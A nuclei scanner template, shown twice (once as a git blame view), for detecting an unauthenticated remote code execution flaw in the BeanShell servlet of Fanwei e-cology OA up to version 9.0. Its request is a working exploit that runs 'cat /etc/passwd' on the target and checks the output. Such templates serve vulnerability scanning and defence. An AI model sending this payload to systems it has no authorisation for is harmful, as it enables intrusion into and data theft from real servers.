nuclei-templates/cnvd/2019/CNVD-2019-32204.yaml

id: CNVD-2019-32204

info:
  name: Fanwei e-cology <=9.0 - Remote Code Execution
  author: daffainfo
  severity: critical
  description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
  reference:
    - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: fanwei,cnvd,cnvd2019,rce

requests:
  - raw:
      - |
        POST /bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/05/12
Create CNVD-2019-32204.yaml 2022-02-20 12:52:06 +00:00			`id: CNVD-2019-32204`

			`info:`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`name: Fanwei e-cology <=9.0 - Remote Code Execution`
Create CNVD-2019-32204.yaml 2022-02-20 12:52:06 +00:00			`author: daffainfo`
			`severity: critical`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10.0`
			`cwe-id: CWE-77`
Update CNVD-2019-32204.yaml 2022-02-28 18:52:23 +00:00			`tags: fanwei,cnvd,cnvd2019,rce`
Create CNVD-2019-32204.yaml 2022-02-20 12:52:06 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /bsh.servlet.BshServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw`

			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00
			`# Enhanced by mp on 2022/05/12`